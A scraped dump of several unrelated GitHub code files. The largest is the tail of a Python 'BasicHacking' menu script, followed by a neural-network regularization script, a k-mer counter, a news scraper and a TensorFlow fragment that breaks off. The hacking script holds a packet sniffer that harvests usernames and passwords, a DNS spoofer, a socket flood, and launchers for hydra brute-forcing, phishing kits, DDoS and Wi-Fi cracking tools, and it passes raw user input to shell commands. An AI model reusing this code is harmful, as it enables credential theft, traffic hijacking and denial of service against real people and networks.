tempfile.mkstemp()\r\n\r\n f = open(path, 'w')\r\n f.write(base64.b64decode(winner[-1]))\r\n f.write('\\nscript-security 2\\nup /etc/openvpn/update-resolv-conf\\ndown /etc/openvpn/update-resolv-conf')\r\n f.close()\r\n\r\n x = subprocess.Popen(['sudo', 'openvpn', '--config', path])\r\n\r\n try:\r\n while True:\r\n time.sleep(600)\r\n # termination with Ctrl+C\r\n except:\r\n try:\r\n x.kill()\r\n except:\r\n pass\r\n while x.poll() != 0:\r\n time.sleep(1)\r\n print ('\\nVPN terminated')\r\n\r\ndef bruteforce():\r\n print(\"sudo hydra -l [user] -P [location wordlist] [IP] [method]\")\r\n print(\"methods:telnet,http,https,ssh,FTP,SMTP[25],IMAP\")\r\n print(\"wordlist:9e89fe_eada3f79027240d38184dd68f8efa476.txt\")\r\n print(\"type without sudo hydra\")\r\n print(\"Example: -l user -P wordlist:9e89fe_eada3f79027240d38184dd68f8efa476.txt 255.255.255.0 http\")\r\n command = input (\">>>\")\r\n os.system(\"sudo hydra \"+command+ \"\")\r\n\r\ndef localflood():\r\n print(\"asegurese de que la carpeta contenga los archivos html para el texto\")\r\n print(\"seguido de esto utilice el comando [CD] para entrar en la carpeta\")\r\n print(\"por ultimo inserte el comando [python -m http.server --bind localhost --cgi [puerto normalmente 8080 o 8081]\")\r\n\r\n\r\ndef fastMeterpreter():\r\n print(\"1--> Download\")\r\n print(\"2--> Execute\")\r\n down = input(\"1 or 2:\")\r\n if down == \"1\":\r\n os.system(\"sudo apt install metasploit-framwerk gnome-terminal python3 python3-pip nc\")\r\n os.system(\"mv fastMeterpreter2/ * \")\r\n os.system(\"pip install -r requirements.txt\")\r\n if down == \"2\":\r\n os.system(\"sudo python3 fastMeterpreter2.py\")\r\n\r\ndef wifispeed():\r\n print(\"1--> Monitoreo grafico\")\r\n print(\"2--> Monitoreo en consola\")\r\n monitoreo = input(\"1 or 2:\")\r\n if monitoreo == \"1\":\r\n times = []\r\n download = []\r\n upload = []\r\n with open('test.csv', 'r') as csvfile:\r\n plots = csv.reader(csvfile, delimiter=',')\r\n next(csvfile)\r\n for row in plots:\r\n times.append(str(row[0]))\r\n download.append(float(row[1]))\r\n upload.append(float(row[2]))\r\n print(times, \"\\n\", download, \"\\n\", upload)\r\n plt.figure('speedtest', [30, 30])\r\n plt.plot(times, download, label='download', color='r')\r\n plt.plot(times, upload, label='upload', color='b')\r\n plt.xlabel('time')\r\n plt.ylabel('speed in Mb/s')\r\n plt.title(\"internet speed\")\r\n plt.legend()\r\n plt.savefig('test_graph.jpg', bbox_inches='tight')\r\n if monitoreo == \"2\":\r\n s = speedtest.Speedtest()\r\n while True:\r\n time = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n downspeed = round((round(s.download()) / 1048576), 2)\r\n upspeed = round((round(s.upload()) / 1048576), 2)\r\n print(f\"time: {time}, downspeed: {downspeed} Mb/s, upspeed: {upspeed} Mb/s\")\r\n\r\ndef passwordspeed():\r\n Hashcat = input(\"Do you have Hashcat installed?(Y or N):\")\r\n if Hashcat == \"Y\":\r\n os.system(\"sudo apt-get install hashcat\")\r\n if hashcat == \"N\":\r\n os.system(\"sudo hashcat -b\")\r\ndef goodkiller():\r\n print(\"1 -->>> download \")\r\n print(\"2 -->> Execute\")\r\n you = input(\"1 or 2:\")\r\n if you == \"1\":\r\n os.system(\"https://github.com/FDX100/GOD-KILLER\")\r\n os.system(\"mv GOD-KILLER/ *\")\r\n os.system(\"sudo python3 install.py\")\r\n if you == \"2\":\r\n os.system(\"GOD-KILLER\")\r\ndef phoneinfoga():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n phoneinfoga = input(\"1 or 2:\")\r\n if phoneinfoga == \"1\":\r\n os.system(\"git clone https://github.com/sundowndev/PhoneInfoga\")\r\n os.system(\"mv PhoneInfoga/ *\")\r\n os.system(\"sudo python3 -m pip install -r requirements.txt --user\")\r\n os.system(\"sudo wget https://github.com/mozilla/geckodriver/releases/download/v0.24.0/geckodriver-v0.24.0-linux64.tar.gz\")\r\n os.system(\"sudo tar xvfz geckodriver-v0.24.0-linux64.tar.gz\")\r\n os.system(\"sudo chmod +x geckodriver\")\r\n os.system(\"sudo export PATH=$PATH:/ruta-extraida/\")\r\n os.system(\"docker pull sundowndev/phoneinfoga:latest\")\r\n os.system(\"docker run --rm -it sundowndev/phoneinfoga --help\")\r\n if phoneinfoga == \"2\":\r\n print(\"EJ:(+51) 927742190\")\r\n phone = input(\"tlfn phone with the (+)>>>\")\r\n os.system(\"python3 phoneinfoga.py -n \"+phone+\"\")\r\ndef BTCanalizer():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n BTC = input(\"1 or 2:\")\r\n if BTC == \"1\":\r\n os.system(\"git clone https://github.com/s4vitar/btcAnalyzer\")\r\n os.system(\"mv btcAnalyzer/ *\")\r\n os.system(\"sudo apt-get install html2text bc -y\")\r\n if BTC == \"2\":\r\n print(\"-n transacciones totales\")\r\n print(\"-i identificador de la transaccion\")\r\n print(\"-a especificar la adress\")\r\n print(\"EJ: -e adress -a XXXXXXXXXXXXXXXXXX\")\r\n what = input(\"command:\")\r\n os.system(\"sudo ./btcAnalyzer\" +what+ \"\")\r\n\r\ndef wifiCrack():\r\n print(\" 1 -->> Download\")\r\n print(\" 2 -->> Execute\")\r\n input = input(\"1,2>>>\")\r\n if Wifi == \"1\":\r\n os.system(\"git clone https://github.com/s4vitar/wifiCrack\")\r\n if Wifi == \"2\":\r\n os.system(\"sudo ./s4iPwnWifi.sh\")\r\n\r\ndef TPLINK():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n tplin = input(\"1 or 2:\")\r\n if tplin == \"1\": \r\n print(\"Wait a second...\")\r\n time.sleep(4)\r\n os.system(\"git clone https://github.com/vk496/linset\")\r\n os.system(\"mv Linset/* .\")\r\n os.system(\"chmod +x linset\")\r\n if tplin == \"2\":\r\n os.system(\"./linset\")\r\ndef Ddoswifi():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n wifi = input(\"1 or 2:\")\r\n if wifi == \"1\":\r\n os.system(\"git clone https://github.com/palahsu/DDoS-Ripper\")\r\n os.system(\"mv DDoS-Ripper/ *\")\r\n if wifi == \"2\": \r\n print(\"_________________________________\")\r\n print(\"select de IP and the turbo(100-x/kB of your network\")\r\n print(\"_________________________________\")\r\n IP = input(\"IP victim:\")\r\n Port = input(\"PORT:\")\r\n turbo = input(\"turbo:\")\r\n os.system(\"sudo python3 DRipper.py -s \"+IP+\" -p \"+Port+\" -t \" +turbo+ \"\")\r\n\r\ndef Ufonet():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n input = input(\"1 or 2:\")\r\n if Ufo == \"1\":\r\n os.system(\"https://github.com/epsylon/ufonet\")\r\n os.system(\"mv ufonet/ *\")\r\n os.system(\"sudo python3 setup.py install\")\r\n os.system(\"sudo apt-get install python3-pycurl python3-geoip python3-whois python3-crypto python3-requests python3-scapy libgeoip1 libgeoip-dev\")\r\n if Ufo == \"2\":\r\n os.system(\"sudo python3 ./ufonet --gui \")\r\n time.sleep(5)\r\n webbrowser.open_new_tab(\"http://127.0.0.1:9999\")\r\ndef Phishing():\r\n customweb = input(\"Do you want to take a custom web?(Y or N):\")\r\n if customweb == \"Y\":\r\n URL = input(\"Enter the custom URL:\")\r\n os.system(\"wget \"+URL+\"\")\r\n print(\"downloading eviltrust...\")\r\n time.sleep(2)\r\n os.system(\"git clone https://github.com/s4vitar/evilTrust\")\r\n os.system(\"mv evilTrust/ *\")\r\n os.system(\"sudo bash evilTrust.sh\")\r\n if customweb == \"N\":\r\n os.system(\"git clone https://github.com/htr-tech/zphisher\")\r\n os.system(\"mv zphisher/ *\")\r\n os.system(\"sudo bash zphisher.sh\")\r\n\r\ndef checkSPY():\r\n print(\"1 -->>> download \")\r\n print(\" 2 -->> Execute\")\r\n input = input(\"1 or 2:\")\r\n if SPY == \"1\":\r\n os.system(\"https://github.com/mvt-project/mvt\")\r\n if SPY == \"2\":\r\n Print(\"Recuerde conectar el telefono VIA USB\")\r\n print(\"Tambien Recuerde leer de arriba hacia abajo\")\r\n print(\"Android or IOS?\")\r\n sistem = input(\">>>\")\r\n if sistem == \"Android\":\r\n os.system(\"mvt-android check-adb\")\r\n os.system(\"mvt-android check-backup\")\r\n os.system(\"mvt-android check-bugreport\")\r\n os.system(\"mvt-android check-iocs\")\r\n print(\"Do you want to install The APK of MVT?\")\r\n nstall = input(\"Y or N?:\")\r\n if ntall == \"Y\":\r\n os.system(\"mvt-android download-apks\")\r\n if ntall == \"N\":\r\n print(\"press ctrl+C to exit\")\r\n time.sleep(1000000000000)\r\n if sistem == \"IOS\":\r\n os.system(\"mvt-ios check-backup\")\r\n os.system(\"mvt-ios check-fs\")\r\n os.system(\"mvt-ios check-iocs\")\r\n print(\"Do you want to install the Public Indicator?\")\r\n niostall = input(\"Y or N:\")\r\n if niostall == \"Y\":\r\n os.system(\"mvt-ios download-iocs\")\r\n print(\"Ctrl+C to exit\")\r\n time.sleep(100000000000000)\r\n if niostall == \"N\":\r\n print(\"Ctrl+C to exit\")\r\n time.sleep(100000000000000)\r\ndef sniffer():\r\n def sniff(interface):\r\n scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)\r\n\r\n def get_url(packet):\r\n return packet[http.HTTPRequest].Host + packet[http.HTTPRequesst].Path\r\n\r\n def get_login_info(packet):\r\n if packet.haslayer(scapy.Raw):\r\n load = packet[scapy.Raw].load\r\n keywords = [\"username\" , \"user\" , \"login\" , \"password\" , \"pass\"]\r\n for keyword in keywords:\r\n if keyword in load:\r\n return load \r\n def process_sniffed_packet(packet):\r\n if packet.haslayer(http.HTTPRequest):\r\n url = packet[http.HTTPREQUEST].Host + packet[http.HTTPREQUEST].path\r\n print(url)\r\n print(\"[+] HTTP Request >>>\" + url)\r\n\r\n login_info = get_login_info(packet)\r\n if login_info:\r\n print(\"\\n\\n[+] Usuario y Contraseña Posibles >\"+ login_Info + \"\\n\\n\")\r\n\r\n sniff(\"eth0\")\r\ndef DNSspoofer():\r\n dev = \"enp3s0f1\"\r\n filter = \"udp port 53\"\r\n file = None\r\n dns_map = {}\r\n\r\n def handle_packet(packet):\r\n ip = packet.getlayer(scapy.IP)\r\n udp = packet.getlayer(scapy.UDP)\r\n dns = packet.getlayer(scapy.DNS)\r\n\r\n # standard (a record) dns query\r\n if dns.qr == 0 and dns.opcode == 0:\r\n queried_host = dns.qd.qname[:-1].decode()\r\n resolved_ip = None\r\n\r\n if dns_map.get(queried_host):\r\n resolved_ip = dns_map.get(queried_host)\r\n elif dns_map.get('*'):\r\n resolved_ip = dns_map.get('*')\r\n\r\n if resolved_ip:\r\n dns_answer = scapy.DNSRR(rrname=queried_host + \".\",\r\n ttl=330,\r\n type=\"A\",\r\n rclass=\"IN\",\r\n rdata=resolved_ip)\r\n\r\n dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \\\r\n scapy.UDP(sport=udp.dport,\r\n dport=udp.sport) / \\\r\n scapy.DNS(\r\n id = dns.id,\r\n qr = 1,\r\n aa = 0,\r\n rcode = 0,\r\n qd = dns.qd,\r\n an = dns_answer\r\n )\r\n\r\n print(\"Send %s has %s to %s\" % (queried_host,\r\n resolved_ip,\r\n ip.src))\r\n scapy.send(dns_reply, iface=dev)\r\n\r\n\r\n def usage():\r\n print(sys.argv[0] + \" -f <hosts-file> -i <dev>\")\r\n sys.exit(1)\r\n\r\n\r\n def parse_host_file(file):\r\n for line in open(file):\r\n line = line.rstrip('\\n')\r\n\r\n if line:\r\n (ip, host) = line.split()\r\n dns_map[host] = ip\r\n\r\n try:\r\n cmd_opts = \"f:i:\"\r\n opts, args = getopt.getopt(sys.argv[1:], cmd_opts)\r\n except getopt.GetoptError:\r\n usage()\r\n\r\n for opt in opts:\r\n if opt[0] == \"-i\":\r\n dev = opt[1]\r\n elif opt[0] == \"-f\":\r\n file = opt[1]\r\n else:\r\n usage()\r\n\r\n if file:\r\n parse_host_file(file)\r\n else:\r\n usage()\r\n\r\n print(\"Spoofing DNS requests on %s\" % (dev))\r\n scapy.sniff(iface=dev, filter=filter, prn=handle_packet)\r\ndef DDOS():\r\n ip = input(\"IP:\")\r\n port = input(\"PUERTO:\")\r\n hilos = input(\"Nº hilos>\")\r\n while True:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((ip, port))\r\n s.sendto(('GET /' + ip + ' HTTP/1.1\\r\\n').encode('ascii', (ip, port)))\r\n \r\n\r\n for _ in range(hilos):\r\n thread = threading.Thread(target=attack)\r\n thread.start()\r\ndef changeMAC():\r\n print(\"ponga la interfaz actual (eth0,wlan0)\")\r\n interfaz = input(\">>>\")\r\n os.system(\"macchanger -r \"+interfaz+\"\")\r\n\r\ndef WPSattack():\r\n print(\" TPLINK -->> 1\")\r\n print(\" Ddos -->> 2\")\r\n print(\" Linset(Rogue AP) -->> 3\")\r\n print(\" bruteforce -->>4\")\r\n tool = input(\"?:\")\r\n if tool == \"1\":\r\n TPLINK()\r\n if tool == \"2\":\r\n os.system(\"sudo cmod +x wifiDos.sh\")\r\n os.system(\"sudo bash wifiDos.sh\")\r\n if tool == \"3\":\r\n Linset()\r\n if tool == \"4\":\r\n WifiCrack()\r\n\r\n\r\n\r\nprint(\"DNSpoofer -->> remplaza un DNS haciendo que salga otra web\")\r\nprint(\"Godkiller -->> Floodea a un numero de telefono por linea directa y manda mensajes customizados\")\r\nprint(\"phoneinfoga -->> Saca la informacion de un numero de telefono\")\r\nprint(\"password speed -->> Check the password crack speed with Sha,MD5,NTLM,LM.etc\")\r\nprint(\"BTC -->> Visuiona las transacciones recientes y el saldo de una billetera BTC\")\r\nprint(\"Sniffer -->> captura los datos de las señales HTTP y recoge la contraseña junto al usuario\")\r\nprint(\" WPS -->> Ataques a diferentes redes wifi\")\r\nprint(\"Ufonet -->> ataque Dos o Ddos a una IP con distintos protocolos\")\r\nprint(\"Ddos -->> un simple ataque distribuido\")\r\nprint(\"XSS -->> realiza un escaneo/ataque en XSS\")\r\nprint(\"vulnerabilidades -->> realiza un escaner de vulnerabilidades con spaghetti\")\r\nprint(\" Phishing -->> Un ataque phisher que puede ser juntado con el DNS spoofer \")\r\nprint(\"checkSpyware --> Detecta los software maliciosos como por ejemplo PEGASUS\")\r\nprint(\"FMhack -->> Interfiere en las radiofrecuencias\")\r\nprint(\"GPS -->> una herramienta para calcular el sitio de un emisor por ondas de radio\")\r\nprint(\"changeIP -->> cambia tu direccion IP pubica con una VPN\")\r\nprint(\"Wifi speed -->> Monitorea la velocidad wifi(puede sertvir para comprobar la tasa de flood)\")\r\nprint(\"Localflood -->> floodea un wifi creando localhosts en diversos puertos\")\r\nprint(\"MAC -->> Cambia la mac del dispositivo, asi haciendolo indetectable\")\r\nprint(\"\")\r\nprint(\"para iniciar DNSspoofer y sniffer se debe iniciar primero:\")\r\nprint(\" sudo python3 arp-spoofer.py\")\r\nprint(\" sudo iptables -I FORWARD -j NFQUEUE --queue-num 0\")\r\nprint(\"en una consola aparte.Muchas Gracias ;D\")\r\n\r\n\r\nthetool = input(\">\")\r\nif thetool == \"DNSpoofer\":\r\n DNSspoofer()\r\nif thetool == \"goodkiller\":\r\n goodkiller()\r\nif thetool == \"bruteforce\":\r\n bruteforce()\r\nif thetool == \"Wifi Speed\":\r\n wifispeed()\r\nif thetool == \"phoneinfoga\":\r\n phoneinfoga()\r\nif thetool == \"password speed\":\r\n passwordspeed()\r\nif thetool == \"BTC\":\r\n BTCanalizer()\r\nif thetool == \"sniffer\":\r\n sniffer()\r\nif thetool == \"Ddos\":\r\n DDOS()\r\nif thetool == \"Phisher\":\r\n Phishing()\r\nif thetool == \"GPS\":\r\n GPS()\r\nif thetool == \"localflood\":\r\n localflood()\r\nif thetool == \"Ufonet\":\r\n Ufonet()\r\nif thetool == \"checkSpyware\":\r\n checkSPY()\r\nif thetool == \"FMhack\":\r\n FMhack()\r\nif thetool == \"changeMAC\":\r\n changeMAC()\r\nif thetool == \"changeIP\":\r\n VPN()\r\nif thetool == \"WPS\":\r\n WPSattack()\r\nif thetool == \"XSS\":\r\n XSSattack()\r\nif thetool == \"vulnerabilidades\":\r\n vulnerability()\r\n","repo_name":"mouse3/BasicHacking","sub_path":"HTC.py","file_name":"HTC.py","file_ext":"py","file_size_in_byte":22368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74483490612","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sklearn\nimport sklearn.datasets\nimport scipy.io\n\nfrom deep_learning.initialization.init_utils import forward_propagation\nfrom deep_learning.regularization.reg_utils import load_2d_data_set, compute_cost, initialize_parameters, \\\n update_parameters, backward_propagation, predict, plot_decision_boundary, predict_dec, relu, sigmoid\nfrom deep_learning.regularization.test_case import compute_cost_with_regularization_test_case, \\\n backward_propagation_with_regularization_test_case, forward_propagation_with_dropout_test_case\n\n\ndef compute_cost_with_regularization(a3: np.ndarray, y: np.ndarray, parameters: dict, lam: float):\n W_sum = 0\n for k, v in parameters.items():\n if \"W\" in k:\n W_sum += np.sum(np.square(v))\n reg = lam * W_sum / (2 * y.shape[1])\n return compute_cost(a3, y) + reg\n\n\ndef backward_propagation_with_regularization(x: np.ndarray, y: np.ndarray, cache: list, lam: float):\n m = x.shape[1]\n (Z1, A1, W1, b1, Z2, A2, W2, b2, Z3, A3, W3, b3) = cache\n dZ3 = A3 - y\n dW3 = np.dot(dZ3, A2.T) / m + lam * W3 / m\n db3 = np.sum(dZ3, axis=1, keepdims=True) / m\n dA2 = np.dot(W3.T, dZ3)\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = np.dot(dZ2, A1.T) / m + lam * W2 / m\n db2 = np.sum(dZ2, axis=1, keepdims=True) / m\n dA1 = np.dot(W2.T, dZ2)\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = np.dot(dZ1, x.T) / m + lam * W1 / m\n db1 = np.sum(dZ1, axis=1, keepdims=True) / m\n return {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3, \"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1,\n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n\n\ndef model(x, y, learning_rate=0.3, num_iterations=30000, print_cost=True, lam=0.0, keep_prob=1.0):\n \"\"\"\n Implements a three-layer neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SIGMOID.\n\n Arguments:\n X -- input data, of shape (input size, number of examples)\n Y -- true \"label\" vector (1 for blue dot / 0 for red dot), of shape (output size, number of examples)\n learning_rate -- learning rate of the optimization\n num_iterations -- number of iterations of the optimization loop\n print_cost -- If True, print the cost every 10000 iterations\n lambd -- regularization hyperparameter, scalar\n keep_prob - probability of keeping a neuron active during drop-out, scalar.\n\n Returns:\n parameters -- parameters learned by the model. They can then be used to predict.\n \"\"\"\n\n grads = {}\n costs = [] # to keep track of the cost\n layers_dims = [x.shape[0], 20, 3, 1]\n\n # Initialize parameters dictionary.\n parameters = initialize_parameters(layers_dims)\n\n # Loop (gradient descent)\n\n for i in range(0, num_iterations):\n\n # Forward propagation: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SIGMOID.\n if keep_prob >= 1:\n a3, cache = forward_propagation(x, parameters)\n else:\n a3, cache = forward_propagation_with_dropout(x, parameters, keep_prob)\n # Cost function\n if lam == 0:\n cost = compute_cost(a3, y)\n else:\n cost = compute_cost_with_regularization(a3, y, parameters, lam)\n\n # Backward propagation.\n assert (lam == 0 or keep_prob == 1) # it is possible to use both L2 regularization and dropout,\n # but this assignment will only explore one at a time\n if lam == 0 and keep_prob == 1:\n grads = backward_propagation(x, y, cache)\n elif lam != 0:\n grads = backward_propagation_with_regularization(x, y, cache, lam)\n elif keep_prob < 1:\n grads = backward_propagation_with_dropout(x, y, cache, keep_prob)\n\n # Update parameters.\n parameters = update_parameters(parameters, grads, learning_rate)\n\n # Print the loss every 10000 iterations\n if print_cost and i % 10000 == 0:\n print(\"Cost after iteration {}: {}\".format(i, cost))\n if print_cost and i % 1000 == 0:\n costs.append(cost)\n\n # plot the cost\n plt.plot(costs)\n plt.ylabel('cost')\n plt.xlabel('iterations (x1,000)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\n return parameters\n\n\ndef forward_propagation_with_dropout(x, parameters, keep_prob=0.5):\n np.random.seed(1)\n\n W1 = parameters['W1']\n b1 = parameters['b1']\n W2 = parameters['W2']\n b2 = parameters['b2']\n W3 = parameters['W3']\n b3 = parameters['b3']\n\n Z1 = np.dot(W1, x) + b1\n A1 = relu(Z1)\n D1 = np.random.rand(A1.shape[0], A1.shape[1])\n D1 = D1 < keep_prob\n A1 = A1 * D1 / keep_prob\n Z2 = np.dot(W2, A1) + b2\n A2 = relu(Z2)\n D2 = np.random.rand(A2.shape[0], A2.shape[1])\n D2 = D2 < keep_prob\n A2 = A2 * D2 / keep_prob\n Z3 = np.dot(W3, A2) + b3\n A3 = sigmoid(Z3)\n cache = (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3)\n return A3, cache\n\n\ndef backward_propagation_with_dropout(x, y, cache, keep_prob):\n m = x.shape[1]\n (Z1, D1, A1, W1, b1, Z2, D2, A2, W2, b2, Z3, A3, W3, b3) = cache\n\n dZ3 = A3 - y\n dW3 = 1. / m * np.dot(dZ3, A2.T)\n db3 = 1. / m * np.sum(dZ3, axis=1, keepdims=True)\n dA2 = np.dot(W3.T, dZ3)\n dA2 = dA2 * D2 # Step 1: Apply mask D2 to shut down the same neurons as during the forward propagation\n dA2 = dA2 / keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n dZ2 = np.multiply(dA2, np.int64(A2 > 0))\n dW2 = 1. / m * np.dot(dZ2, A1.T)\n db2 = 1. / m * np.sum(dZ2, axis=1, keepdims=True)\n\n dA1 = np.dot(W2.T, dZ2)\n dA1 = dA1 * D1 # Step 1: Apply mask D1 to shut down the same neurons as during the forward propagation\n dA1 = dA1 / keep_prob # Step 2: Scale the value of neurons that haven't been shut down\n dZ1 = np.multiply(dA1, np.int64(A1 > 0))\n dW1 = 1. / m * np.dot(dZ1, x.T)\n db1 = 1. / m * np.sum(dZ1, axis=1, keepdims=True)\n\n return {\"dZ3\": dZ3, \"dW3\": dW3, \"db3\": db3, \"dA2\": dA2,\n \"dZ2\": dZ2, \"dW2\": dW2, \"db2\": db2, \"dA1\": dA1,\n \"dZ1\": dZ1, \"dW1\": dW1, \"db1\": db1}\n\n\ndef plot_regularization_l2():\n train_x, train_y, test_x, test_y = load_2d_data_set()\n parameters = model(train_x, train_y, lam=0.7)\n print(\"On the train set:\")\n predict(train_x, train_y, parameters)\n print(\"On the test set:\")\n predict(train_x, train_y, parameters)\n\n plt.title(\"Model with L2-regularization\")\n axes = plt.gca()\n axes.set_xlim([-0.75, 0.40])\n axes.set_ylim([-0.75, 0.65])\n plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_x, train_y)\n\n\ndef plot_drop_out():\n train_x, train_y, test_x, test_y = load_2d_data_set()\n\n parameters = model(train_x, train_y, keep_prob=0.86, learning_rate=0.3)\n print(\"On the train set:\")\n predict(train_x, train_y, parameters)\n print(\"On the test set:\")\n predict(test_x, test_y, parameters)\n\n plt.title(\"Model with dropout\")\n axes = plt.gca()\n axes.set_xlim([-0.75, 0.40])\n axes.set_ylim([-0.75, 0.65])\n plot_decision_boundary(lambda x: predict_dec(parameters, x.T), train_x, train_y)\n\n\nplot_drop_out()\n","repo_name":"YaoIna/PythonStart","sub_path":"deep_learning/regularization/regularization.py","file_name":"regularization.py","file_ext":"py","file_size_in_byte":7107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19478911784","text":"# Find the most frequent k-mers in a DNA string\n\nimport collections\n\n# Asking for the DNA string\n\ndna = input(\"DNA string?\")\nprint(\"Length of DNA string:\", len(dna))\n\n# Asking for the length of k\n\n\ndef input_k (message):\n while True:\n try:\n user_input = int(input(message))\n except ValueError:\n print(\"Not a valid number.\")\n print(\"Please enter a number!\")\n continue\n else:\n return user_input\n break\n\n\nk = input_k(\"Please enter the length of k:\")\n\n# Asking for the allowed error\n\n\ndef input_m(message):\n while True:\n try:\n user_input = int(input(message))\n except ValueError:\n print(\"Not a valid number.\")\n print(\"Please enter a number!\")\n continue\n else:\n return user_input\n break\n\n\nm = input_m (\"Please enter the allowed error:\")\n\n# Counting function\nin_mistake = m\nout_result = []\nkmer_list = []\n\n\ndef hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError()\n else:\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\n\n\nfor i in range(len(dna)-k + 1):\n v = dna[i:i + k]\n out_result.append(v)\n\n\nfor i in range(len(out_result) - 1):\n for j in range(i+1, len(out_result)):\n if hamming_distance(str(out_result[i]), str(out_result[j])) <= in_mistake:\n kmer_list.extend([out_result[i], out_result[j]])\n\n\nkmer_count = collections.Counter(kmer_list).most_common(14)\n\nprint(\"Most frequent kmers:\", (kmer_count))\n\n\n\n","repo_name":"pnawrath/bioinfomatics","sub_path":"finding k-mers.py","file_name":"finding k-mers.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41561546801","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom ..pdf2txt import readPDF\nimport os\n\nclass BaiInfoNews(scrapy.Spider):\n name = 'baiinfo_news'\n\n def start_requests(self):\n url = 'http://www.baiinfo.com/Orders/NewsList/7704'\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(url, headers=headers, callback=self.parse)\n\n def parse(self, response):\n news_list = response.xpath('//div[@class=\"news_more_left\"]/ul/li')\n for news in news_list:\n title = news.xpath('a//text()').extract_first().replace('/', '-')\n url = news.xpath('a/@href').extract_first()\n publish_date = news.xpath('span/text()').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n if 'Orders' in url:\n url = 'http://www.baiinfo.com' + url\n yield scrapy.Request(url,\n headers=headers,\n meta={'title': title, 'publish_date': publish_date},\n callback=self.detail_parse)\n\n page_info = response.xpath('//div[@class=\"news_tel_4\"]/ul/div/a')\n for curr in page_info:\n page_indentify = curr.xpath('text()').extract_first()\n if page_indentify == '下一页':\n next_page = 'http://www.baiinfo.com' + curr.xpath('@href').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(next_page, headers=headers, callback=self.parse)\n\n def detail_parse(self, response):\n title = response.meta['title']\n publish_date = response.meta['publish_date']\n file_dir = self.path + '/' + publish_date\n self.logger.info(publish_date)\n self.logger.info(title)\n\n file_path = self.path + '/' + publish_date + '/' + title # no include extention\n if not os.path.exists(file_dir):\n os.makedirs(file_dir)\n content = ''.join(response.xpath('//ul[@class=\"news_tel_z\"]//text()').extract())\n if '点击下载' in content:\n pdf_url = response.xpath('//ul[@class=\"news_tel_z\"]/div[@class=\"news_tex\"]//a/@href').extract_first()\n headers = {'Referer': 'http://www.baiinfo.com/yjbg/yanjiugaobao',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu '\n 'Chromium/57.0.2987.98 Chrome/57.0.2987.98 Safari/537.36'}\n yield scrapy.Request(pdf_url, headers=headers, meta={'file_path': file_path}, callback=self.downloads)\n else:\n with open(file_path+'.txt', 'w') as f:\n f.write(content)\n\n def downloads(self, response):\n file_path = response.meta['file_path']\n with open(file_path+'.pdf', 'wb') as f:\n f.write(response.body)\n ret = readPDF(file_path+'.pdf')\n","repo_name":"csyezheng/web-scraping-examples","sub_path":"baiinfo_news/baiinfo_news/spiders/baiinfo_news.py","file_name":"baiinfo_news.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"15972225091","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n'''\n\n#Central to TF is tensors. Primitive values shaped into an array. Rank is dimensions. Shape is tuple of ints specifying arrays length\n#numpy arrays represent tensors\n\n#The TF core is the computational graph and running it in a session\n\n# Graphs have Operations representing nodes, and tensors as edges\n\na = tf.constant(3.0, dtype=tf.float32)\nb = tf.constant(4.0) # also tf.float32 implicitly\ntotal = a + b\n\nprint(a)\nprint(b)\nprint(total)\n\n\n\n#The above outputs the computational graph, each with a unique name. Not values.\n\n\n# evaluation requires creating a tf.Session object.\n\nsess = tf.Session()\nprint(sess.run(total))\n\nprint(sess.run({'ab':(a, b), 'total':total}))\n\nvec = tf.random_uniform(shape=(3,))\nout1 = vec + 1\nout2 = vec + 